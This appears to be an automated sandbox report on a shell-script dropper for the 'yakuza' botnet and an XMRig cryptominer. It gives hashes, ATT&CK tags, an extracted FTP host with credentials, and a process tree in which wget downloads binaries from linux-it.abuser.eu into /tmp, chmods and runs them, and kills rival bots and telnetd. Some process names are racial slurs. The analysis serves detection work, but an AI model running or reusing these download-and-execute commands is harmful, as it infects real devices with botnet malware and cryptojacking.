xmrig | ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf

Analysis

max time kernel
150s
max time network
153s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
24-11-2024 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh
Size

2KB
MD5

f50f60f970a5203dad27c480da7b4519
SHA1

f50f26900efe72f11c37767b5db9a3916a7c76b4
SHA256

ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
SHA512

40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd

Score

10^/10

xmrig xmrig_linux defense_evasion discovery miner

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
linux-it.abuser.eu
Port:
21
Username:
anonymous
Password:
[email protected]

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral3/files/fstream-2.dat	family_xmrig
behavioral3/files/fstream-2.dat	xmrig

Xmrig family
xmrig
Xmrig_linux family
xmrig_linux
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

File and Directory Permissions Modification 1 TTPs 14 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
995	chmod
750	chmod
786	chmod
842	chmod
928	chmod
737	chmod
879	chmod
905	chmod
941	chmod
952	chmod
765	chmod
814	chmod
856	chmod
866	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/yakuza.mips	738	yakuza.mips
/tmp/xmrig	996	xmrig

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/11/cmdline	pkill
File opened for reading	/proc/76/cmdline	pkill
File opened for reading	/proc/380/status	pkill
File opened for reading	/proc/705/cmdline	pkill
File opened for reading	/proc/1256/cmdline	pkill
File opened for reading	/proc/12/cmdline	pkill
File opened for reading	/proc/5/cmdline	pkill
File opened for reading	/proc/37/status	pkill
File opened for reading	/proc/23/cmdline	pkill
File opened for reading	/proc/243/cmdline	pkill
File opened for reading	/proc/328/cmdline	pkill
File opened for reading	/proc/419/status	pkill
File opened for reading	/proc/71/status	pkill
File opened for reading	/proc/5/status	pkill
File opened for reading	/proc/386/cmdline	pkill
File opened for reading	/proc/filesystems	pkill
File opened for reading	/proc/741/status	pkill
File opened for reading	/proc/1095/status	pkill
File opened for reading	/proc/741/cmdline	pkill
File opened for reading	/proc/747/status	pkill
File opened for reading	/proc/7/cmdline	pkill
File opened for reading	/proc/22/status	pkill
File opened for reading	/proc/174/status	pkill
File opened for reading	/proc/386/cmdline	pkill
File opened for reading	/proc/1110/status	pkill
File opened for reading	/proc/13/cmdline	pkill
File opened for reading	/proc/359/cmdline	pkill
File opened for reading	/proc/359/status	pkill
File opened for reading	/proc/154/status	pkill
File opened for reading	/proc/706/cmdline	pkill
File opened for reading	/proc/354/status	pkill
File opened for reading	/proc/12/status	pkill
File opened for reading	/proc/4/status	pkill
File opened for reading	/proc/12/cmdline	pkill
File opened for reading	/proc/174/status	pkill
File opened for reading	/proc/111/status	pkill
File opened for reading	/proc/8/cmdline	pkill
File opened for reading	/proc/125/cmdline	pkill
File opened for reading	/proc/36/cmdline	pkill
File opened for reading	/proc/sys/kernel/osrelease	pkill
File opened for reading	/proc/1/status	pkill
File opened for reading	/proc/739/cmdline	pkill
File opened for reading	/proc/6/status	pkill
File opened for reading	/proc/12/cmdline	pkill
File opened for reading	/proc/23/cmdline	pkill
File opened for reading	/proc/6/status	pkill
File opened for reading	/proc/22/cmdline	pkill
File opened for reading	/proc/76/cmdline	pkill
File opened for reading	/proc/13/status	pkill
File opened for reading	/proc/680/status	pkill
File opened for reading	/proc/21/cmdline	pkill
File opened for reading	/proc/243/cmdline	pkill
File opened for reading	/proc/672/status	pkill
File opened for reading	/proc/6/cmdline	pkill
File opened for reading	/proc/380/status	pkill
File opened for reading	/proc/sys/kernel/osrelease	pkill
File opened for reading	/proc/355/cmdline	pkill
File opened for reading	/proc/705/cmdline	pkill
File opened for reading	/proc/73/cmdline	pkill
File opened for reading	/proc/filesystems	pkill
File opened for reading	/proc/4/status	pkill
File opened for reading	/proc/70/cmdline	pkill
File opened for reading	/proc/76/status	pkill
File opened for reading	/proc/124/cmdline	pkill

System Network Configuration Discovery 1 TTPs 9 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
740	rm
755	rm
1116	pkill
1117	busybox
717	wget
738	yakuza.mips
745	wget
751	yakuza.mipsel
1115	sh

Writes file to tmp directory 15 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/yakuza.mips	wget
File opened for modification	/tmp/yakuza.mipsel	wget
File opened for modification	/tmp/yakuza.arm5	wget
File opened for modification	/tmp/xmrig	curl
File opened for modification	/tmp/S�@@p�~@8	sh
File opened for modification	/tmp/yakuza.sh	wget
File opened for modification	/tmp/yakuza.arm6	wget
File opened for modification	/tmp/yakuza.i686	wget
File opened for modification	/tmp/yakuza.x86	wget
File opened for modification	/tmp/yakuza.ppc	wget
File opened for modification	/tmp/yakuza.arm7	wget
File opened for modification	/tmp/yakuza.sparc	wget
File opened for modification	/tmp/yakuza.i586	wget
File opened for modification	/tmp/yakuza.m68k	wget
File opened for modification	/tmp/yakuza.arm4	wget

/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh
/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh
1⤵
PID:710
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:717
- /bin/chmod
  chmod +x yakuza.mips
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/yakuza.mips
  ./yakuza.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:738
- - /bin/sh
    sh -c "pkill -9 902i13 || busybox pkill -9 902i13"
    3⤵
    PID:743
  - - /usr/bin/pkill
      pkill -9 902i13
      4⤵
      PID:744
  - - /bin/busybox
      busybox pkill -9 902i13
      4⤵
      PID:746
- - /bin/sh
    sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"
    3⤵
    PID:747
  - - /usr/bin/pkill
      pkill -9 BzSxLxBxeY
      4⤵
      Reads runtime system information
      PID:748
  - - /bin/busybox
      busybox pkill -9 BzSxLxBxeY
      4⤵
      PID:749
- - /bin/sh
    sh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"
    3⤵
    PID:753
  - - /usr/bin/pkill
      pkill -9 HOHO-LUGO7
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:754
  - - /bin/busybox
      busybox pkill -9 HOHO-LUGO7
      4⤵
      PID:757
- - /bin/sh
    sh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"
    3⤵
    PID:758
  - - /usr/bin/pkill
      pkill -9 HOHO-U79OL
      4⤵
      PID:759
  - - /bin/busybox
      busybox pkill -9 HOHO-U79OL
      4⤵
      PID:760
- - /bin/sh
    sh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"
    3⤵
    PID:761
  - - /usr/bin/pkill
      pkill -9 JuYfouyf87
      4⤵
      PID:762
  - - /bin/busybox
      busybox pkill -9 JuYfouyf87
      4⤵
      PID:763
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:764
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:766
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:769
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:775
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      Reads runtime system information
      PID:776
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:778
- - /bin/sh
    sh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"
    3⤵
    PID:790
  - - /usr/bin/pkill
      pkill -9 LOLKIKEEEDDE
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:791
  - - /bin/busybox
      busybox pkill -9 LOLKIKEEEDDE
      4⤵
      PID:795
- - /bin/sh
    sh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"
    3⤵
    PID:803
  - - /usr/bin/pkill
      pkill -9 ekjheory98e
      4⤵
      Reads CPU attributes
      PID:804
  - - /bin/busybox
      busybox pkill -9 ekjheory98e
      4⤵
      PID:806
- - /bin/sh
    sh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"
    3⤵
    PID:818
  - - /usr/bin/pkill
      pkill -9 scansh4
      4⤵
      Reads runtime system information
      PID:820
  - - /bin/busybox
      busybox pkill -9 scansh4
      4⤵
      PID:825
- - /bin/sh
    sh -c "pkill -9 MDMA || busybox pkill -9 MDMA"
    3⤵
    PID:837
  - - /usr/bin/pkill
      pkill -9 MDMA
      4⤵
      PID:838
  - - /bin/busybox
      busybox pkill -9 MDMA
      4⤵
      PID:839
- - /bin/sh
    sh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"
    3⤵
    PID:845
  - - /usr/bin/pkill
      pkill -9 fdevalvex
      4⤵
      Reads CPU attributes
      PID:846
  - - /bin/busybox
      busybox pkill -9 fdevalvex
      4⤵
      PID:849
- - /bin/sh
    sh -c "pkill -9 scanspc || busybox pkill -9 scanspc"
    3⤵
    PID:850
  - - /usr/bin/pkill
      pkill -9 scanspc
      4⤵
      Reads CPU attributes
      PID:851
  - - /bin/busybox
      busybox pkill -9 scanspc
      4⤵
      PID:852
- - /bin/sh
    sh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"
    3⤵
    PID:853
  - - /usr/bin/pkill
      pkill -9 MELTEDNINJAREALZ
      4⤵
      Reads CPU attributes
      PID:854
  - - /bin/busybox
      busybox pkill -9 MELTEDNINJAREALZ
      4⤵
      PID:855
- - /bin/sh
    sh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"
    3⤵
    PID:861
  - - /usr/bin/pkill
      pkill -9 flexsonskids
      4⤵
      Reads runtime system information
      PID:862
  - - /bin/busybox
      busybox pkill -9 flexsonskids
      4⤵
      PID:863
- - /bin/sh
    sh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"
    3⤵
    PID:864
  - - /usr/bin/pkill
      pkill -9 scanx86
      4⤵
      Reads CPU attributes
      PID:865
  - - /bin/busybox
      busybox pkill -9 scanx86
      4⤵
      PID:869
- - /bin/sh
    sh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"
    3⤵
    PID:872
  - - /usr/bin/pkill
      pkill -9 MISAKI-U79OL
      4⤵
      PID:873
  - - /bin/busybox
      busybox pkill -9 MISAKI-U79OL
      4⤵
      PID:874
- - /bin/sh
    sh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"
    3⤵
    PID:884
  - - /usr/bin/pkill
      pkill -9 foAxi102kxe
      4⤵
      Reads CPU attributes
      PID:887
  - - /bin/busybox
      busybox pkill -9 foAxi102kxe
      4⤵
      PID:892
- - /bin/sh
    sh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"
    3⤵
    PID:897
  - - /usr/bin/pkill
      pkill -9 swodjwodjwoj
      4⤵
      Reads CPU attributes
      PID:898
  - - /bin/busybox
      busybox pkill -9 swodjwodjwoj
      4⤵
      PID:900
- - /bin/sh
    sh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"
    3⤵
    PID:912
  - - /usr/bin/pkill
      pkill -9 MmKiy7f87l
      4⤵
      PID:913
  - - /bin/busybox
      busybox pkill -9 MmKiy7f87l
      4⤵
      PID:916
- - /bin/sh
    sh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"
    3⤵
    PID:921
  - - /usr/bin/pkill
      pkill -9 freecookiex86
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:922
  - - /bin/busybox
      busybox pkill -9 freecookiex86
      4⤵
      PID:924
- - /bin/sh
    sh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"
    3⤵
    PID:935
  - - /usr/bin/pkill
      pkill -9 sysgpu
      4⤵
      PID:936
  - - /bin/busybox
      busybox pkill -9 sysgpu
      4⤵
      PID:937
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:938
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      PID:939
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:940
- - /bin/sh
    sh -c "pkill -9 frgege || busybox pkill -9 frgege"
    3⤵
    PID:946
  - - /usr/bin/pkill
      pkill -9 frgege
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:947
  - - /bin/busybox
      busybox pkill -9 frgege
      4⤵
      PID:948
- - /bin/sh
    sh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"
    3⤵
    PID:949
  - - /usr/bin/pkill
      pkill -9 sysupdater
      4⤵
      PID:950
  - - /bin/busybox
      busybox pkill -9 sysupdater
      4⤵
      PID:951
- - /bin/sh
    sh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"
    3⤵
    PID:963
  - - /usr/bin/pkill
      pkill -9 0DnAzepd
      4⤵
      PID:964
  - - /bin/busybox
      busybox pkill -9 0DnAzepd
      4⤵
      PID:965
- - /bin/sh
    sh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"
    3⤵
    PID:968
  - - /usr/bin/pkill
      pkill -9 NiGGeRD0nks69
      4⤵
      Reads runtime system information
      PID:969
  - - /bin/busybox
      busybox pkill -9 NiGGeRD0nks69
      4⤵
      PID:970
- - /bin/sh
    sh -c "pkill -9 frgreu || busybox pkill -9 frgreu"
    3⤵
    PID:971
  - - /usr/bin/pkill
      pkill -9 frgreu
      4⤵
      Reads runtime system information
      PID:972
  - - /bin/busybox
      busybox pkill -9 frgreu
      4⤵
      PID:973
- - /bin/sh
    sh -c "pkill -9 telnetd || busybox pkill -9 telnetd"
    3⤵
    PID:974
  - - /usr/bin/pkill
      pkill -9 telnetd
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:975
  - - /bin/busybox
      busybox pkill -9 telnetd
      4⤵
      PID:976
- - /bin/sh
    sh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"
    3⤵
    PID:977
  - - /usr/bin/pkill
      pkill -9 0x766f6964
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:978
  - - /bin/busybox
      busybox pkill -9 0x766f6964
      4⤵
      PID:979
- - /bin/sh
    sh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"
    3⤵
    PID:980
  - - /usr/bin/pkill
      pkill -9 NiGGeRd0nks1337
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:981
  - - /bin/busybox
      busybox pkill -9 NiGGeRd0nks1337
      4⤵
      PID:982
- - /bin/sh
    sh -c "pkill -9 gaft || busybox pkill -9 gaft"
    3⤵
    PID:983
  - - /usr/bin/pkill
      pkill -9 gaft
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:984
  - - /bin/busybox
      busybox pkill -9 gaft
      4⤵
      PID:985
- - /bin/sh
    sh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"
    3⤵
    PID:986
  - - /usr/bin/pkill
      pkill -9 urasgbsigboa
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:987
  - - /bin/busybox
      busybox pkill -9 urasgbsigboa
      4⤵
      PID:988
- - /bin/sh
    sh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"
    3⤵
    PID:989
  - - /usr/bin/pkill
      pkill -9 120i3UI49
      4⤵
      Reads runtime system information
      PID:990
  - - /bin/busybox
      busybox pkill -9 120i3UI49
      4⤵
      PID:991
- - /bin/sh
    sh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"
    3⤵
    PID:992
  - - /usr/bin/pkill
      pkill -9 OaF3
      4⤵
      PID:993
  - - /bin/busybox
      busybox pkill -9 OaF3
      4⤵
      PID:994
- - /bin/sh
    sh -c "pkill -9 geae || busybox pkill -9 geae"
    3⤵
    PID:998
  - - /usr/bin/pkill
      pkill -9 geae
      4⤵
      Reads CPU attributes
      PID:999
  - - /bin/busybox
      busybox pkill -9 geae
      4⤵
      PID:1000
- - /bin/sh
    sh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"
    3⤵
    PID:1001
  - - /usr/bin/pkill
      pkill -9 vaiolmao
      4⤵
      Reads CPU attributes
      PID:1002
  - - /bin/busybox
      busybox pkill -9 vaiolmao
      4⤵
      PID:1003
- - /bin/sh
    sh -c "pkill -9 123123a || busybox pkill -9 123123a"
    3⤵
    PID:1004
  - - /usr/bin/pkill
      pkill -9 123123a
      4⤵
      Reads CPU attributes
      PID:1005
  - - /bin/busybox
      busybox pkill -9 123123a
      4⤵
      PID:1006
- - /bin/sh
    sh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"
    3⤵
    PID:1007
  - - /usr/bin/pkill
      pkill -9 Ofurain0n4H34D
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1008
  - - /bin/busybox
      busybox pkill -9 Ofurain0n4H34D
      4⤵
      PID:1009
- - /bin/sh
    sh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"
    3⤵
    PID:1010
  - - /usr/bin/pkill
      pkill -9 ggTrex
      4⤵
      PID:1011
  - - /bin/busybox
      busybox pkill -9 ggTrex
      4⤵
      PID:1012
- - /bin/sh
    sh -c "pkill -9 wasads || busybox pkill -9 wasads"
    3⤵
    PID:1013
  - - /usr/bin/pkill
      pkill -9 wasads
      4⤵
      PID:1014
  - - /bin/busybox
      busybox pkill -9 wasads
      4⤵
      PID:1015
- - /bin/sh
    sh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"
    3⤵
    PID:1016
  - - /usr/bin/pkill
      pkill -9 1293194hjXD
      4⤵
      PID:1017
  - - /bin/busybox
      busybox pkill -9 1293194hjXD
      4⤵
      PID:1018
- - /bin/sh
    sh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"
    3⤵
    PID:1019
  - - /usr/bin/pkill
      pkill -9 OthLaLosn
      4⤵
      PID:1020
  - - /bin/busybox
      busybox pkill -9 OthLaLosn
      4⤵
      PID:1021
- - /bin/sh
    sh -c "pkill -9 ggt || busybox pkill -9 ggt"
    3⤵
    PID:1022
  - - /usr/bin/pkill
      pkill -9 ggt
      4⤵
      Reads runtime system information
      PID:1023
  - - /bin/busybox
      busybox pkill -9 ggt
      4⤵
      PID:1024
- - /bin/sh
    sh -c "pkill -9 wget-log || busybox pkill -9 wget-log"
    3⤵
    PID:1025
  - - /usr/bin/pkill
      pkill -9 wget-log
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1026
  - - /bin/busybox
      busybox pkill -9 wget-log
      4⤵
      PID:1027
- - /bin/sh
    sh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"
    3⤵
    PID:1028
  - - /usr/bin/pkill
      pkill -9 1337SoraLOADER
      4⤵
      Reads runtime system information
      PID:1029
  - - /bin/busybox
      busybox pkill -9 1337SoraLOADER
      4⤵
      PID:1030
- - /bin/sh
    sh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"
    3⤵
    PID:1031
  - - /usr/bin/pkill
      pkill -9 SAIAKINA
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1032
  - - /bin/busybox
      busybox pkill -9 SAIAKINA
      4⤵
      PID:1033
- - /bin/sh
    sh -c "pkill -9 ggtq || busybox pkill -9 ggtq"
    3⤵
    PID:1034
  - - /usr/bin/pkill
      pkill -9 ggtq
      4⤵
      Reads runtime system information
      PID:1035
  - - /bin/busybox
      busybox pkill -9 ggtq
      4⤵
      PID:1036
- - /bin/sh
    sh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"
    3⤵
    PID:1037
  - - /usr/bin/pkill
      pkill -9 1378bfp919GRB1Q2
      4⤵
      Reads runtime system information
      PID:1038
  - - /bin/busybox
      busybox pkill -9 1378bfp919GRB1Q2
      4⤵
      PID:1039
- - /bin/sh
    sh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"
    3⤵
    PID:1040
  - - /usr/bin/pkill
      pkill -9 SAIAKUSO
      4⤵
      PID:1041
  - - /bin/busybox
      busybox pkill -9 SAIAKUSO
      4⤵
      PID:1042
- - /bin/sh
    sh -c "pkill -9 ggtr || busybox pkill -9 ggtr"
    3⤵
    PID:1043
  - - /usr/bin/pkill
      pkill -9 ggtr
      4⤵
      PID:1044
  - - /bin/busybox
      busybox pkill -9 ggtr
      4⤵
      PID:1045
- - /bin/sh
    sh -c "pkill -9 14Fa || busybox pkill -9 14Fa"
    3⤵
    PID:1046
  - - /usr/bin/pkill
      pkill -9 14Fa
      4⤵
      Reads runtime system information
      PID:1047
  - - /bin/busybox
      busybox pkill -9 14Fa
      4⤵
      PID:1048
- - /bin/sh
    sh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"
    3⤵
    PID:1049
  - - /usr/bin/pkill
      pkill -9 SEXSLAVE1337
      4⤵
      Reads CPU attributes
      PID:1050
  - - /bin/busybox
      busybox pkill -9 SEXSLAVE1337
      4⤵
      PID:1051
- - /bin/sh
    sh -c "pkill -9 ggtt || busybox pkill -9 ggtt"
    3⤵
    PID:1052
  - - /usr/bin/pkill
      pkill -9 ggtt
      4⤵
      PID:1053
  - - /bin/busybox
      busybox pkill -9 ggtt
      4⤵
      PID:1054
- - /bin/sh
    sh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"
    3⤵
    PID:1055
  - - /usr/bin/pkill
      pkill -9 1902a3u912u3u4
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1056
  - - /bin/busybox
      busybox pkill -9 1902a3u912u3u4
      4⤵
      PID:1057
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:1058
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      PID:1059
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:1060
- - /bin/sh
    sh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"
    3⤵
    PID:1061
  - - /usr/bin/pkill
      pkill -9 haetrghbr
      4⤵
      PID:1062
  - - /bin/busybox
      busybox pkill -9 haetrghbr
      4⤵
      PID:1063
- - /bin/sh
    sh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"
    3⤵
    PID:1064
  - - /usr/bin/pkill
      pkill -9 19ju3d
      4⤵
      Reads CPU attributes
      PID:1065
  - - /bin/busybox
      busybox pkill -9 19ju3d
      4⤵
      PID:1066
- - /bin/sh
    sh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"
    3⤵
    PID:1067
  - - /usr/bin/pkill
      pkill -9 SORAojkf120
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1068
  - - /bin/busybox
      busybox pkill -9 SORAojkf120
      4⤵
      PID:1069
- - /bin/sh
    sh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"
    3⤵
    PID:1070
  - - /usr/bin/pkill
      pkill -9 hehahejeje92
      4⤵
      Reads CPU attributes
      PID:1071
  - - /bin/busybox
      busybox pkill -9 hehahejeje92
      4⤵
      PID:1072
- - /bin/sh
    sh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"
    3⤵
    PID:1073
  - - /usr/bin/pkill
      pkill -9 2U2JDJA901F91
      4⤵
      PID:1074
  - - /bin/busybox
      busybox pkill -9 2U2JDJA901F91
      4⤵
      PID:1075
- - /bin/sh
    sh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"
    3⤵
    PID:1076
  - - /usr/bin/pkill
      pkill -9 SlaVLav12
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1077
  - - /bin/busybox
      busybox pkill -9 SlaVLav12
      4⤵
      PID:1078
- - /bin/sh
    sh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"
    3⤵
    PID:1079
  - - /usr/bin/pkill
      pkill -9 helpmedaddthhhhh
      4⤵
      Reads CPU attributes
      PID:1080
  - - /bin/busybox
      busybox pkill -9 helpmedaddthhhhh
      4⤵
      PID:1081
- - /bin/sh
    sh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"
    3⤵
    PID:1082
  - - /usr/bin/pkill
      pkill -9 2wgg9qphbq
      4⤵
      PID:1083
  - - /bin/busybox
      busybox pkill -9 2wgg9qphbq
      4⤵
      PID:1084
- - /bin/sh
    sh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"
    3⤵
    PID:1085
  - - /usr/bin/pkill
      pkill -9 Slav3Th3seD3vices
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1086
  - - /bin/busybox
      busybox pkill -9 Slav3Th3seD3vices
      4⤵
      PID:1087
- - /bin/sh
    sh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"
    3⤵
    PID:1088
  - - /usr/bin/pkill
      pkill -9 hzSmYZjYMQ
      4⤵
      PID:1089
  - - /bin/busybox
      busybox pkill -9 hzSmYZjYMQ
      4⤵
      PID:1090
- - /bin/sh
